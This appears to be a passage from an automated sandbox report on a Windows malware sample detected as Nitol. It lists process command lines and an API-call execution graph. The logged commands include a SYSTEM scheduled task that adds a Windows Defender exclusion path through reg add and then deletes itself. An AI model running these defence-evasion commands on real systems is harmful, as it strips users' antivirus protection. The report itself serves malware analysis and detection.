                                                                                          Commandline:SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"
                                                                                          Imagebase:0x7ff7e8a80000
                                                                                          File size:235'008 bytes
                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:36
                                                                                          Start time:22:44:18
                                                                                          Start date:10/01/2025
                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:SCHTASKS /Run /TN "Task1"
                                                                                          Imagebase:0x7ff7e8a80000
                                                                                          File size:235'008 bytes
                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:37
                                                                                          Start time:22:44:18
                                                                                          Start date:10/01/2025
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
                                                                                          Imagebase:0x7ff7f5dd0000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:38
                                                                                          Start time:22:44:18
                                                                                          Start date:10/01/2025
                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:SCHTASKS /Delete /TN "Task1" /F
                                                                                          Imagebase:0x7ff7e8a80000
                                                                                          File size:235'008 bytes
                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:39
                                                                                          Start time:22:44:19
                                                                                          Start date:10/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff70f010000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:40
                                                                                          Start time:22:44:19
                                                                                          Start date:10/01/2025
                                                                                          Path:C:\Windows\System32\reg.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
                                                                                          Imagebase:0x7ff713fd0000
                                                                                          File size:77'312 bytes
                                                                                          MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:42
                                                                                          Start time:22:45:09
                                                                                          Start date:10/01/2025
                                                                                          Path:C:\Program Files (x86)\byHW9q\byHW9q.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Program Files (x86)\byHW9q\byHW9q.exe"
                                                                                          Imagebase:0x7d0000
                                                                                          File size:54'152 bytes
                                                                                          MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 0000002A.00000002.3244554396.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 0000002A.00000002.3242107450.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          Antivirus matches:
                                                                                          • Detection: 0%, ReversingLabs
                                                                                          Has exited:false

                                                                                          Target ID:43
                                                                                          Start time:22:45:11
                                                                                          Start date:10/01/2025
                                                                                          Path:C:\Program Files (x86)\byHW9q\byHW9q.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Program Files (x86)\byHW9q\byHW9q.exe"
                                                                                          Imagebase:0x7d0000
                                                                                          File size:54'152 bytes
                                                                                          MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:44
                                                                                          Start time:22:45:12
                                                                                          Start date:10/01/2025
                                                                                          Path:C:\Program Files (x86)\x736Pg9\QmbK8U.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Program Files (x86)\x736Pg9\QmbK8U.exe"
                                                                                          Imagebase:0x630000
                                                                                          File size:54'152 bytes
                                                                                          MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Antivirus matches:
                                                                                          • Detection: 0%, ReversingLabs
                                                                                          Has exited:true

                                                                                          Target ID:45
                                                                                          Start time:22:45:13
                                                                                          Start date:10/01/2025
                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:cmd /c echo.>c:\xxxx.ini
                                                                                          Imagebase:0xc50000
                                                                                          File size:236'544 bytes
                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:46
                                                                                          Start time:22:45:13
                                                                                          Start date:10/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff70f010000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:47
                                                                                          Start time:22:45:13
                                                                                          Start date:10/01/2025
                                                                                          Path:C:\Program Files (x86)\byHW9q\byHW9q.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Program Files (x86)\byHW9q\byHW9q.exe"
                                                                                          Imagebase:0x7d0000
                                                                                          File size:54'152 bytes
                                                                                          MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:48
                                                                                          Start time:22:46:01
                                                                                          Start date:10/01/2025
                                                                                          Path:C:\Program Files (x86)\x736Pg9\QmbK8U.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Program Files (x86)\x736Pg9\QmbK8U.exe"
                                                                                          Imagebase:0x630000
                                                                                          File size:54'152 bytes
                                                                                          MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:49
                                                                                          Start time:22:46:01
                                                                                          Start date:10/01/2025
                                                                                          Path:C:\Program Files (x86)\byHW9q\byHW9q.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Program Files (x86)\byHW9q\byHW9q.exe"
                                                                                          Imagebase:0x7d0000
                                                                                          File size:54'152 bytes
                                                                                          MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Reset < >

                                                                                            Execution Graph

                                                                                            Execution Coverage:2.1%
                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                            Signature Coverage:31.8%
                                                                                            Total number of Nodes:466
                                                                                            Total number of Limit Nodes:7
                                                                                            execution_graph 14017 140005df3 14018 140005e71 14017->14018 14019 140005e84 CreateFileA 14018->14019 14020 140005f50 _SetThrowImageBase 14019->14020 14021 140005fc3 malloc ReadFile 14020->14021 15163 140007412 15165 140007333 15163->15165 15164 140007403 15165->15164 15166 1400073e0 LdrLoadDll 15165->15166 15166->15165 15867 140013670 InitializeCriticalSection CreateEventW CreateEventW CreateEventW 15870 1400054e0 15867->15870 15869 1400136ef 15871 14000552c 15870->15871 15875 140005506 sprintf_s 15870->15875 15872 1400074d0 LdrLoadDll 15871->15872 15873 140005536 15872->15873 15874 140008370 3 API calls 15873->15874 15877 140005545 _SetThrowImageBase 15874->15877 15875->15869 15876 1400055b8 15878 140008de0 _lock 2 API calls 15876->15878 15877->15876 15880 1400074f0 LdrLoadDll 15877->15880 15879 1400055c0 sprintf_s 15878->15879 15879->15875 15881 140005561 CreateThread 15880->15881 15881->15879 15882 1400055b0 GetLastError 15881->15882 15882->15876 14026 140005a70 GetStartupInfoW GetProcessHeap HeapAlloc 14027 140005ab1 14026->14027 14028 140005add GetVersionExA 14026->14028 14031 140005abf 14027->14031 14076 140009540 14027->14076 14029 140005b0e GetProcessHeap HeapFree 14028->14029 14030 140005af0 GetProcessHeap HeapFree 14028->14030 14036 140005b3c 14029->14036 14033 140005d0b 14030->14033 14084 140009300 14031->14084 14035 140005ac9 14095 140008510 GetModuleHandleA 14035->14095 14099 14000a310 HeapCreate 14036->14099 14039 140005bec 14040 140005c12 14039->14040 14041 140005bf0 14039->14041 14045 140005c17 14040->14045 14042 140005bfe 14041->14042 14043 140009540 _lock 12 API calls 14041->14043 14044 140009300 _lock 10 API calls 14042->14044 14043->14042 14046 140005c08 14044->14046 14047 140005c3d 14045->14047 14048 140005c29 14045->14048 14050 140009540 _lock 12 API calls 14045->14050 14049 140008510 _lock 3 API calls 14046->14049 14102 140009f50 GetStartupInfoA 14047->14102 14051 140009300 _lock 10 API calls 14048->14051 14049->14040 14050->14048 14052 140005c33 14051->14052 14054 140008510 _lock 3 API calls 14052->14054 14054->14047 14056 140005c56 14122 140009e30 14056->14122 14059 140005c5b 14140 140009c30 14059->14140 14063 140005c73 14064 140005c81 14063->14064 14065 1400084e0 _lock 12 API calls 14063->14065 14170 140009690 14064->14170 14065->14064 14067 140005c86 14068 140005c94 14067->14068 14069 1400084e0 _lock 12 API calls 14067->14069 14182 140008650 14068->14182 14069->14068 14071 140005c9e 14072 1400084e0 _lock 12 API calls 14071->14072 14073 140005ca9 14071->14073 14072->14073 14186 140001520 14073->14186 14075 140005ad3 14075->14033 14080 14000954e _lock 14076->14080 14077 14000961c 14077->14031 14078 14000959c 14079 140009300 _lock 10 API calls 14078->14079 14079->14077 14080->14077 14080->14078 14081 1400095c9 GetStdHandle 14080->14081 14081->14078 14082 1400095dc 14081->14082 14082->14078 14083 1400095e2 WriteFile 14082->14083 14083->14078 14087 140009320 _lock 14084->14087 14085 140009330 14085->14035 14086 1400094dc GetStdHandle 14086->14085 14088 1400094ef 14086->14088 14087->14085 14087->14086 14091 140009375 _lock 14087->14091 14088->14085 14089 1400094f5 WriteFile 14088->14089 14089->14085 14090 1400093b9 GetModuleFileNameA 14092 1400093d9 _lock 14090->14092 14091->14085 14091->14090 14204 14000f000 14092->14204 14096 140008543 ExitProcess 14095->14096 14097 14000852a GetProcAddress 14095->14097 14097->14096 14098 14000853f 14097->14098 14098->14096 14100 14000a334 14099->14100 14101 14000a339 HeapSetInformation 14099->14101 14100->14039 14101->14039 14230 140008370 14102->14230 14104 140005c48 14104->14056 14115 1400084e0 14104->14115 14105 14000a1c4 GetStdHandle 14112 14000a17c 14105->14112 14106 140008370 3 API calls 14109 140009f8a 14106->14109 14107 14000a239 SetHandleCount 14107->14104 14108 14000a1d8 GetFileType 14108->14112 14109->14104 14109->14106 14110 14000a0e3 14109->14110 14109->14112 14110->14104 14111 14000a11c GetFileType 14110->14111 14110->14112 14235 14000edc0 14110->14235 14111->14110 14112->14104 14112->14105 14112->14107 14112->14108 14114 14000edc0 _lock 3 API calls 14112->14114 14114->14112 14116 140009540 _lock 12 API calls 14115->14116 14117 1400084ed 14116->14117 14118 140009300 _lock 10 API calls 14117->14118 14119 1400084f4 14118->14119 14120 1400073e0 _lock LdrLoadDll 14119->14120 14121 140008500 14120->14121 14123 140009e7c 14122->14123 14124 140009e3e GetCommandLineW 14122->14124 14127 140009e81 GetCommandLineW 14123->14127 14128 140009e69 14123->14128 14125 140009e49 GetCommandLineW 14124->14125 14126 140009e5e GetLastError 14124->14126 14125->14126 14126->14128 14129 140009e75 14126->14129 14127->14128 14128->14129 14130 140009e91 GetCommandLineA MultiByteToWideChar 14128->14130 14129->14059 14131 140009ec8 14130->14131 14132 140009ed9 14130->14132 14131->14059 14133 140008370 3 API calls 14132->14133 14134 140009eeb 14133->14134 14135 140009f32 14134->14135 14136 140009ef3 MultiByteToWideChar 14134->14136 14135->14059 14137 140009f13 14136->14137 14138 140009f2a 14136->14138 14137->14059 14249 140008de0 14138->14249 14141 140009c52 GetEnvironmentStringsW 14140->14141 14142 140009c86 14140->14142 14145 140009c6c GetLastError 14141->14145 14150 140009c60 14141->14150 14143 140009c91 GetEnvironmentStringsW 14142->14143 14144 140009c77 14142->14144 14147 140005c67 14143->14147 14143->14150 14146 140009d09 GetEnvironmentStrings 14144->14146 14144->14147 14145->14142 14145->14144 14146->14147 14148 140009d17 14146->14148 14166 1400099c0 GetModuleFileNameW 14147->14166 14149 140009d58 14148->14149 14152 140009d20 MultiByteToWideChar 14148->14152 14153 140008370 3 API calls 14149->14153 14254 140008300 14150->14254 14152->14147 14152->14148 14155 140009d68 14153->14155 14158 140009d7d 14155->14158 14159 140009d70 FreeEnvironmentStringsA 14155->14159 14156 140009ce1 __CxxFrameHandler 14161 140009cef FreeEnvironmentStringsW 14156->14161 14157 140009cd1 FreeEnvironmentStringsW 14157->14147 14160 140009de5 FreeEnvironmentStringsA 14158->14160 14162 140009d90 MultiByteToWideChar 14158->14162 14159->14147 14160->14147 14161->14147 14162->14158 14163 140009e0e 14162->14163 14164 140008de0 _lock 2 API calls 14163->14164 14165 140009e16 FreeEnvironmentStringsA 14164->14165 14165->14147 14168 140009a03 14166->14168 14167 140008300 _lock 17 API calls 14169 140009bca 14167->14169 14168->14167 14168->14169 14169->14063 14171 1400096b2 14170->14171 14172 1400096a8 14170->14172 14173 140008370 3 API calls 14171->14173 14172->14067 14181 1400096fa 14173->14181 14174 140009709 14174->14067 14175 1400097a5 14176 140008de0 _lock 2 API calls 14175->14176 14177 1400097b4 14176->14177 14177->14067 14178 140008370 3 API calls 14178->14181 14179 1400097e5 14180 140008de0 _lock 2 API calls 14179->14180 14180->14177 14181->14174 14181->14175 14181->14178 14181->14179 14183 140008666 14182->14183 14185 1400086bf 14183->14185 14270 140005380 14183->14270 14185->14071 14187 140001565 14186->14187 14188 140001569 14187->14188 14189 14000157e 14187->14189 14308 140001430 GetModuleFileNameW OpenSCManagerW 14188->14308 14192 140001595 OpenSCManagerW 14189->14192 14193 14000164f 14189->14193 14196 1400015b2 GetLastError 14192->14196 14197 1400015cf OpenServiceW 14192->14197 14194 140001654 14193->14194 14195 140001669 StartServiceCtrlDispatcherW 14193->14195 14317 1400011f0 14194->14317 14195->14075 14196->14075 14199 140001611 DeleteService 14197->14199 14200 1400015e9 GetLastError CloseServiceHandle 14197->14200 14202 140001626 CloseServiceHandle CloseServiceHandle 14199->14202 14203 14000161e GetLastError 14199->14203 14200->14075 14202->14075 14203->14202 14205 14000f01e __CxxFrameHandler 14204->14205 14206 14000f03b LoadLibraryA 14205->14206 14207 14000f125 _lock 14205->14207 14208 14000f054 GetProcAddress 14206->14208 14209 1400094c9 14206->14209 14221 14000f165 14207->14221 14227 1400073e0 LdrLoadDll 14207->14227 14208->14209 14210 14000f06d _lock 14208->14210 14209->14035 14215 14000f075 GetProcAddress 14210->14215 14211 1400073e0 _lock LdrLoadDll 14211->14209 14212 1400073e0 _lock LdrLoadDll 14219 14000f1e9 14212->14219 14217 140007220 _lock 14215->14217 14216 1400073e0 _lock LdrLoadDll 14216->14221 14218 14000f094 GetProcAddress 14217->14218 14220 14000f0b3 _lock 14218->14220 14222 1400073e0 _lock LdrLoadDll 14219->14222 14224 14000f1a3 _lock 14219->14224 14220->14207 14223 14000f0e9 GetProcAddress 14220->14223 14221->14212 14221->14224 14222->14224 14225 14000f101 _lock 14223->14225 14224->14211 14225->14207 14226 14000f10d GetProcAddress 14225->14226 14226->14207 14228 140007333 14227->14228 14228->14227 14229 140007403 14228->14229 14229->14216 14231 1400083a0 14230->14231 14233 1400083e0 14231->14233 14234 1400083be Sleep 14231->14234 14241 14000e850 14231->14241 14233->14109 14234->14231 14234->14233 14236 1400073e0 _lock LdrLoadDll 14235->14236 14237 14000edec _lock 14236->14237 14238 14000ee26 GetModuleHandleA 14237->14238 14239 14000ee1d _lock 14237->14239 14238->14239 14240 14000ee38 GetProcAddress 14238->14240 14239->14110 14240->14239 14242 14000e865 14241->14242 14243 14000e8be HeapAlloc 14242->14243 14244 14000e876 sprintf_s 14242->14244 14246 1400090b0 14242->14246 14243->14242 14243->14244 14244->14231 14247 1400073e0 _lock LdrLoadDll 14246->14247 14248 1400090c5 14247->14248 14248->14242 14250 140008de9 HeapFree 14249->14250 14253 140008e19 _lock 14249->14253 14251 140008dff sprintf_s 14250->14251 14250->14253 14252 140008e09 GetLastError 14251->14252 14252->14253 14253->14135 14255 140008320 14254->14255 14257 140008338 Sleep 14255->14257 14258 140008358 14255->14258 14259 1400090f0 14255->14259 14257->14255 14257->14258 14258->14156 14258->14157 14260 140009103 14259->14260 14261 14000919e 14259->14261 14263 14000914c HeapAlloc 14260->14263 14264 140009540 _lock 12 API calls 14260->14264 14266 1400090b0 _lock LdrLoadDll 14260->14266 14267 140009300 _lock 10 API calls 14260->14267 14268 140008510 _lock 3 API calls 14260->14268 14269 140009173 sprintf_s 14260->14269 14262 1400090b0 _lock LdrLoadDll 14261->14262 14265 1400091a3 sprintf_s 14262->14265 14263->14260 14263->14269 14264->14260 14265->14255 14266->14260 14267->14260 14268->14260 14269->14255 14273 140005250 14270->14273 14272 140005389 14272->14185 14274 140005271 14273->14274 14275 1400073e0 _lock LdrLoadDll 14274->14275 14276 14000527e 14275->14276 14277 1400073e0 _lock LdrLoadDll 14276->14277 14278 14000528d 14277->14278 14284 1400052f0 _lock 14278->14284 14285 140008490 14278->14285 14280 1400052b5 14281 1400052d9 14280->14281 14280->14284 14288 140008400 14280->14288 14283 140008400 7 API calls 14281->14283 14281->14284 14283->14284 14284->14272 14286 1400084c5 HeapSize 14285->14286 14287 140008499 sprintf_s 14285->14287 14287->14280 14290 140008430 14288->14290 14291 140008472 14290->14291 14292 140008450 Sleep 14290->14292 14293 14000e920 14290->14293 14291->14281 14292->14290 14292->14291 14294 14000e935 14293->14294 14295 14000e94c 14294->14295 14305 14000e95e 14294->14305 14296 140008de0 _lock 2 API calls 14295->14296 14299 14000e951 14296->14299 14297 14000e9b1 14298 1400090b0 _lock LdrLoadDll 14297->14298 14301 14000e9b9 _lock sprintf_s 14298->14301 14299->14290 14300 14000e973 HeapReAlloc 14300->14301 14300->14305 14301->14290 14302 14000e9f4 sprintf_s 14304 14000e9f9 GetLastError 14302->14304 14303 1400090b0 _lock LdrLoadDll 14303->14305 14304->14301 14305->14297 14305->14300 14305->14302 14305->14303 14306 14000e9db sprintf_s 14305->14306 14307 14000e9e0 GetLastError 14306->14307 14307->14301 14309 140001482 CreateServiceW 14308->14309 14310 14000147a GetLastError 14308->14310 14312 1400014ea GetLastError 14309->14312 14313 1400014df CloseServiceHandle 14309->14313 14311 1400014fd 14310->14311 14323 140004f30 14311->14323 14314 1400014f2 CloseServiceHandle 14312->14314 14313->14314 14314->14311 14316 14000150d 14316->14075 14318 1400011fa 14317->14318 14332 1400051d0 14318->14332 14321 140004f30 sprintf_s NtAllocateVirtualMemory 14322 140001262 14321->14322 14322->14075 14325 140004f39 _SetThrowImageBase 14323->14325 14324 140004f44 14324->14316 14325->14324 14328 140006c95 14325->14328 14327 14000660e sprintf_s 14327->14316 14329 140006d7b 14328->14329 14331 140006d9d 14328->14331 14330 140006f95 NtAllocateVirtualMemory 14329->14330 14329->14331 14330->14331 14331->14327 14335 140008270 14332->14335 14334 140001238 MessageBoxW 14334->14321 14336 1400082ac sprintf_s 14335->14336 14337 14000827e 14335->14337 14336->14334 14337->14336 14339 140008120 14337->14339 14340 14000816a 14339->14340 14344 14000813b sprintf_s 14339->14344 14342 1400081d7 14340->14342 14340->14344 14345 140007f50 14340->14345 14343 140007f50 sprintf_s 54 API calls 14342->14343 14342->14344 14343->14344 14344->14336 14346 140007f69 sprintf_s 14345->14346 14347 140007f74 sprintf_s 14346->14347 14348 14000801d 14346->14348 14358 14000cd50 14346->14358 14347->14342 14349 1400080d5 14348->14349 14350 14000802f 14348->14350 14351 14000cc00 sprintf_s 54 API calls 14349->14351 14352 14000804c 14350->14352 14354 140008081 14350->14354 14355 140008056 14351->14355 14361 14000cc00 14352->14361 14354->14355 14369 14000c2a0 14354->14369 14355->14342 14359 140008300 _lock 17 API calls 14358->14359 14360 14000cd6a 14359->14360 14360->14348 14362 14000cc3f 14361->14362 14368 14000cc23 sprintf_s 14361->14368 14362->14368 14377 14000fc50 14362->14377 14366 14000ccc5 sprintf_s 14422 14000fd20 LeaveCriticalSection 14366->14422 14368->14355 14370 14000c2e0 14369->14370 14373 14000c2c3 sprintf_s 14369->14373 14371 14000fc50 sprintf_s 25 API calls 14370->14371 14370->14373 14372 14000c34e 14371->14372 14374 14000c1f0 sprintf_s 2 API calls 14372->14374 14375 14000c367 sprintf_s 14372->14375 14373->14355 14374->14375 14456 14000fd20 LeaveCriticalSection 14375->14456 14378 14000fc96 14377->14378 14379 14000fccb 14377->14379 14423 14000b400 14378->14423 14381 14000ccac 14379->14381 14382 14000fccf EnterCriticalSection 14379->14382 14381->14366 14387 14000c3f0 14381->14387 14382->14381 14390 14000c42e 14387->14390 14406 14000c427 sprintf_s 14387->14406 14388 140004f30 sprintf_s NtAllocateVirtualMemory 14389 14000cbe6 14388->14389 14389->14366 14393 14000c4fb _SetThrowImageBase sprintf_s 14390->14393 14390->14406 14450 14000c1f0 14390->14450 14392 14000c841 14394 14000c86a 14392->14394 14395 14000cb20 WriteFile 14392->14395 14393->14392 14396 14000c526 GetConsoleMode 14393->14396 14398 14000c936 14394->14398 14402 14000c876 14394->14402 14397 14000cb53 GetLastError 14395->14397 14395->14406 14396->14392 14399 14000c557 14396->14399 14397->14406 14404 14000c940 14398->14404 14412 14000ca02 14398->14412 14399->14392 14400 14000c564 GetConsoleCP 14399->14400 14400->14406 14416 14000c581 sprintf_s 14400->14416 14401 14000c8c5 WriteFile 14401->14402 14403 14000c928 GetLastError 14401->14403 14402->14401 14402->14406 14403->14406 14404->14406 14407 14000c991 WriteFile 14404->14407 14405 14000ca57 WideCharToMultiByte 14409 14000cb15 GetLastError 14405->14409 14405->14412 14406->14388 14407->14404 14408 14000c9f4 GetLastError 14407->14408 14408->14406 14409->14406 14410 14000cab0 WriteFile 14411 14000caf6 GetLastError 14410->14411 14410->14412 14411->14406 14411->14412 14412->14405 14412->14406 14412->14410 14413 14000fd50 7 API calls sprintf_s 14413->14416 14414 14000c649 WideCharToMultiByte 14414->14406 14415 14000c68c WriteFile 14414->14415 14415->14416 14417 14000c80d GetLastError 14415->14417 14416->14406 14416->14413 14416->14414 14418 14000c829 GetLastError 14416->14418 14419 14000c6e2 WriteFile 14416->14419 14421 14000c81b GetLastError 14416->14421 14417->14406 14418->14406 14419->14416 14420 14000c7ff GetLastError 14419->14420 14420->14406 14421->14406 14424 14000b41e 14423->14424 14425 14000b42f EnterCriticalSection 14423->14425 14429 14000b2f0 14424->14429 14427 14000b423 14427->14425 14428 1400084e0 _lock 12 API calls 14427->14428 14428->14425 14430 14000b317 14429->14430 14431 14000b32e 14429->14431 14432 140009540 _lock 12 API calls 14430->14432 14433 140008300 _lock 17 API calls 14431->14433 14437 14000b342 sprintf_s 14431->14437 14434 14000b31c 14432->14434 14435 14000b350 14433->14435 14436 140009300 _lock 10 API calls 14434->14436 14435->14437 14440 14000b400 _lock 22 API calls 14435->14440 14438 14000b324 14436->14438 14437->14427 14439 140008510 _lock GetModuleHandleA GetProcAddress ExitProcess 14438->14439 14439->14431 14441 14000b371 14440->14441 14442 14000b3a7 14441->14442 14443 14000b379 14441->14443 14444 140008de0 _lock HeapFree GetLastError 14442->14444 14445 14000edc0 _lock LdrLoadDll GetModuleHandleA GetProcAddress 14443->14445 14449 14000b392 sprintf_s 14444->14449 14446 14000b386 14445->14446 14448 140008de0 _lock HeapFree GetLastError 14446->14448 14446->14449 14447 14000b3b0 LeaveCriticalSection 14447->14437 14448->14449 14449->14447 14451 14000c20c sprintf_s 14450->14451 14452 14000c212 sprintf_s 14451->14452 14453 14000c22c SetFilePointer 14451->14453 14452->14393 14454 14000c24a GetLastError 14453->14454 14455 14000c254 sprintf_s 14453->14455 14454->14455 14455->14393 16406 7ff8fdf911b0 16413 7ff8fdf91209 16406->16413 16407 7ff8fdf914f0 16439 7ff8fdf91a40 16407->16439 16408 7ff8fdf91b70 _log10_special 8 API calls 16412 7ff8fdf914d3 16408->16412 16409 7ff8fdf91b90 51 API calls 16424 7ff8fdf91300 _invalid_parameter_noinfo_noreturn 16409->16424 16410 7ff8fdf912c7 16416 7ff8fdf91b90 51 API calls 16410->16416 16411 7ff8fdf9129e 16415 7ff8fdf914f6 16411->16415 16425 7ff8fdf91b90 16411->16425 16413->16407 16413->16410 16413->16411 16418 7ff8fdf912b9 BuildCatchObjectHelperInternal 16413->16418 16413->16424 16442 7ff8fdf91110 16415->16442 16416->16418 16418->16409 16422 7ff8fdf914eb 16434 7ff8fdf979cc 16422->16434 16424->16408 16427 7ff8fdf91b9b 16425->16427 16426 7ff8fdf912b0 16426->16418 16426->16422 16427->16426 16428 7ff8fdf97a4c BuildCatchObjectHelperInternal 2 API calls 16427->16428 16429 7ff8fdf91bba 16427->16429 16428->16427 16430 7ff8fdf91bc5 16429->16430 16448 7ff8fdf921f0 16429->16448 16432 7ff8fdf91110 Concurrency::cancel_current_task 51 API calls 16430->16432 16433 7ff8fdf91bcb 16432->16433 16435 7ff8fdf97844 _invalid_parameter_noinfo_noreturn 47 API calls 16434->16435 16436 7ff8fdf979e5 16435->16436 16437 7ff8fdf979fc _invalid_parameter_noinfo_noreturn 17 API calls 16436->16437 16438 7ff8fdf979fa 16437->16438 16457 7ff8fdf91b34 16439->16457 16443 7ff8fdf9111e Concurrency::cancel_current_task 16442->16443 16444 7ff8fdf93990 Concurrency::cancel_current_task 2 API calls 16443->16444 16445 7ff8fdf9112f 16444->16445 16446 7ff8fdf9379c __std_exception_copy 49 API calls 16445->16446 16447 7ff8fdf91159 16446->16447 16449 7ff8fdf921fe Concurrency::cancel_current_task 16448->16449 16452 7ff8fdf93990 16449->16452 16451 7ff8fdf9220f 16453 7ff8fdf939af 16452->16453 16454 7ff8fdf939d8 RtlPcToFileHeader 16453->16454 16455 7ff8fdf939fa RaiseException 16453->16455 16456 7ff8fdf939f0 16454->16456 16455->16451 16456->16455 16462 7ff8fdf91ab0 16457->16462 16460 7ff8fdf93990 Concurrency::cancel_current_task 2 API calls 16461 7ff8fdf91b56 16460->16461 16463 7ff8fdf9379c __std_exception_copy 49 API calls 16462->16463 16464 7ff8fdf91ae4 16463->16464 16464->16460 14022 140006c95 14023 140006d7b 14022->14023 14025 140006d9d 14022->14025 14024 140006f95 NtAllocateVirtualMemory 14023->14024 14023->14025 14024->14025 14457 1400054e0 14458 14000552c 14457->14458 14462 140005506 sprintf_s 14457->14462 14470 1400074d0 14458->14470 14461 140008370 3 API calls 14464 140005545 _SetThrowImageBase 14461->14464 14463 1400055b8 14465 140008de0 _lock 2 API calls 14463->14465 14464->14463 14474 1400074f0 14464->14474 14466 1400055c0 sprintf_s 14465->14466 14466->14462 14469 1400055b0 GetLastError 14469->14463 14472 140007333 14470->14472 14471 140005536 14471->14461 14472->14471 14473 1400073e0 LdrLoadDll 14472->14473 14473->14472 14476 140007333 14474->14476 14475 140005561 CreateThread 14475->14466 14475->14469 14476->14475 14477 1400073e0 LdrLoadDll 14476->14477 14477->14476

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
